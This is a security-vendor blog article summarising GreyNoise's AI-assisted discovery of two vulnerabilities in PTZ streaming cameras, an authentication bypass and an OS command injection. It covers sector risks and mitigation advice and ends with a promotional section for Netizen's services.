GreyNoise Intelligence has recently identified two critical zero-day vulnerabilities in IoT-connected live-streaming cameras, highlighting the need for enhanced cybersecurity measures and proactive detection capabilities in widely deployed devices. These vulnerabilities demonstrate the growing risks posed by IoT devices in sensitive settings, such as healthcare facilities, industrial plants, government operations, and religious institutions. This article will outline the nature of these security flaws, their potential impact across sectors, and the role of AI in uncovering these threats.
Background: GreyNoise’s AI-Driven Threat Detection
GreyNoise, a cybersecurity firm with a reputation for advanced threat intelligence, uses an extensive network of sensors to track malicious internet traffic and distinguish it from benign activity. This network enables the detection of emerging threats by analyzing patterns that might otherwise go unnoticed by conventional security measures. In this case, GreyNoise’s AI-driven tools flagged unusual activity targeting specific live-streaming PTZ (pan-tilt-zoom) cameras. The flagged traffic led to the discovery of two previously unknown vulnerabilities, underscoring the effectiveness of AI in early detection.
Vulnerabilities Identified: CVE-2024-8956 and CVE-2024-8957
GreyNoise’s findings include two zero-day vulnerabilities in PTZ cameras, which are often used in settings that require high privacy and operational reliability. Affected models include devices equipped with NewTek’s Network Device Interface (NDI) technology, primarily using firmware versions below 6.3.40. These cameras are made by brands such as PTZOptics, Multicam Systems SAS, and SMTAV Corporation, all of which employ the HiSilicon Hi3516A V600 system-on-chip platform.
CVE-2024-8956 (Insufficient Authentication, CVSS Score: 9.1)
The first vulnerability, CVE-2024-8956, exposes devices to unauthorized access due to inadequate authentication protocols. This flaw allows attackers to access usernames, MD5-hashed passwords, and other sensitive configuration data. Given the outdated and insecure nature of MD5 hashing, attackers could potentially crack these credentials, enabling them to take over the device and access private video feeds.
CVE-2024-8957 (OS Command Injection, CVSS Score: 7.2)
The second vulnerability, CVE-2024-8957, is an OS command injection flaw that allows attackers to execute arbitrary commands on the cameras. If combined with CVE-2024-8956, this flaw can enable total device control, allowing attackers to view, alter, or disable video streams. Attackers may also use compromised devices for Distributed Denial-of-Service (DDoS) attacks or other malicious purposes.
Sector-Specific Risks
The wide-ranging use of PTZ cameras in sensitive environments makes these vulnerabilities especially concerning:
- Industrial Operations: Many manufacturing plants use PTZ cameras for quality control and equipment monitoring. Unauthorized access could allow attackers to surveil operations or disrupt critical monitoring.
- Healthcare and Telehealth: In medical settings, these cameras may enable telehealth and surgical streaming. A breach could expose patient data, violate privacy regulations, and disrupt essential services.
- Government and Judicial Settings: Government facilities, including courtrooms, rely on secure video streams for both transparency and security. A vulnerability in these environments could compromise sensitive proceedings or disrupt government operations.
- Religious Institutions: Streaming cameras are often used in houses of worship to broadcast services. Unpatched vulnerabilities could allow attackers to disrupt live streams or monitor services.
AI’s Role in Early Detection and Mitigation
GreyNoise’s AI-driven tools played a critical role in identifying these vulnerabilities before they were widely exploited. By analyzing global traffic patterns, GreyNoise’s system flagged the exploit attempt as an anomaly. This proactive approach allowed researchers to isolate and investigate the vulnerabilities, leading to their disclosure and the timely development of solutions.
Responsible Disclosure and Next Steps
Following the discovery, GreyNoise collaborated with VulnCheck to disclose these vulnerabilities responsibly to the affected vendors. This collaboration provided manufacturers with the information needed to address the flaws before they could be exploited on a broader scale. Responsible disclosure is crucial in ensuring that security gaps are addressed swiftly, protecting users from potential exploitation.
The Future of AI in IDR
GreyNoise’s application of AI in incident detection and response (IDR) offers a strong case for using machine learning in managing and mitigating cybersecurity threats, especially in high-stakes settings that involve real-time data and sensitive environments. Here’s why you might see AI more heavily adopted in the IDR field:
How AI Improves IDR
The scale at which AI operates allows organizations to analyze vast amounts of data almost instantaneously, scanning for deviations that would take human analysts far longer to identify. AI in IDR is essential in IoT contexts, where the network size and device count often make manual monitoring inefficient. By leveraging AI, GreyNoise was able to sort through internet traffic at a global scale to identify malicious activity targeting live-streaming cameras without requiring manual oversight for each device. Once flagged, the system allowed for the vulnerabilities to be investigated and responsibly disclosed.
Proactive vs. Reactive Cybersecurity
The traditional approach to incident response often involves responding to detected breaches, which can already compromise sensitive data or operations. In contrast, AI’s real-time capabilities enable a proactive approach, where anomalous patterns are flagged before vulnerabilities are exploited at scale. GreyNoise’s detection of CVE-2024-8956 and CVE-2024-8957 illustrates how AI can offer organizations lead time to patch or isolate vulnerabilities. This proactive stance is crucial for settings such as industrial sites, healthcare facilities, and government agencies, where IoT vulnerabilities could lead to privacy breaches, service disruptions, or even physical security risks.
AI as the Future of IDR
The use of AI by GreyNoise demonstrates how machine learning and behavioral analytics will continue to reshape IDR. As AI becomes more integrated into cybersecurity, we can expect faster threat detection, more accurate identification of potential attacks, and a proactive approach to securing IoT networks and other critical infrastructure. These capabilities are essential in a world where the number and complexity of IoT-connected devices are only increasing. By enabling faster, data-driven responses to cyber threats, AI not only improves the security of individual devices but also contributes to broader network resilience and reliability across sectors.
How Organizations Can Safeguard IoT Devices
Organizations relying on IoT devices like PTZ cameras can take several steps to improve security:
- Patch Management: Regularly update firmware and software for IoT devices. Contact vendors to confirm whether devices are affected by known vulnerabilities and apply patches promptly.
- Network Segmentation: Isolate IoT devices on separate networks to prevent unauthorized access to sensitive systems if a device is compromised.
- Enhanced Authentication: Implement strong, multi-factor authentication for all IoT devices, avoiding outdated or insecure methods like MD5 hashing.
- Traffic Monitoring and AI Detection: Leverage AI-driven security tools to monitor network traffic and detect unusual activity, potentially flagging vulnerabilities before they become widespread.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Questions or concerns? Feel free to reach out to us any time –
https://www.netizen.net/contact
